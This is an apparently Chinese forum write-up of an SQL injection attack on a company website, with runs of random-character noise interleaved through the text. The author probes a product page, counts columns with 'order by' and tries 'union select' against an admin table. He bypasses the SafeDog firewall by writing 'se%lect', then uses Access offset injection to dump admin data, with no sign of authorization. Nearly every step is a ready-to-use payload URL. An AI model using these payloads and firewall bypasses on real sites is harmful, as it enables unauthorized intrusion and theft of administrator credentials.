打开网站,一个企业站。 m6 G0 ]# m, D# q- A3 Z
. L7 P! E0 e- y) `' n
) c& w3 n6 t# z6 @& a: F$ d% I0 k+ L# p顺手加个admin
- H p, m3 d- U5 G, Z: U3 ]8 }% w& d
& [0 Z+ q( z' |/ J5 [# W K) D5 o5 _默认后台。
" n8 W$ D( |, s! H" H0 ?) f回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。 H. H. R/ Q% e5 I4 S
, _# |2 y( v b- z! k% B! k; w
. C1 ?2 e, E3 e" v$ g7 p! t8 B L$ [/ O1 l. M- ]
所以就不用御剑扫了,待会直接封IP。1 f8 O* g7 a- G6 G& `2 C- ~
T! Q* [9 V# [4 |
用order by语句判断是否存在注入。
! |+ |% r8 x i9 N* Bhttp://www.xxx.com /product_show.asp?id=997 order by 19 G3 ~. l; u% c9 K1 v) d+ B i% G, r
http://www.xxx.com /product_show.asp?id=997 order by 100
3 `1 X1 f; |$ i3 l现在存在注入,经测试后发现是9个字段。% `0 Z: f' S; T f' k9 X% Z
9 U& }* C! u+ @6 [7 K% F9 v接下来进行联合查询,猜是否存在admin表。
9 c" d- X/ ]) T8 Y+ C3 v! _1 k9 jhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
6 D6 Y4 [, s! r/ ^, D8 |; M
. P D! N. d l) {
$ `& g" S8 o" Z+ ~5 N
9 Q8 O) t* V0 l5 W0 z8 R3 z: \在select中间加个%,se%lect绕过安全狗。8 T7 A! S d; S" q3 {6 y
* _) @! @ G0 p1 I; T9 Y
2 H1 r) i4 {/ N/ Q. U! z' n
发现存在admin表,然后开始手工猜常用的字段。
5 l; u- z7 ~- k+ P纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
1 d% P7 s( Z9 n0 J
- ^* \* Y& s* O" G3 L突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。+ E$ U4 @; g. ?) r4 D+ U
7 M# O' Y3 ~; x+ [8 B( Y6 g
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
: L4 H J9 X) E- }http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
7 M* f) ]- q* U6 R1 m, H; ^& z好了,敏感内容出显了。) ^1 s" ?4 Q& _& J
. @3 h2 R& H0 R+ K9 b9 _
2 O5 X6 X, g" d, p0 ?# M
0 O" u* J: v8 j% f. ]9 U |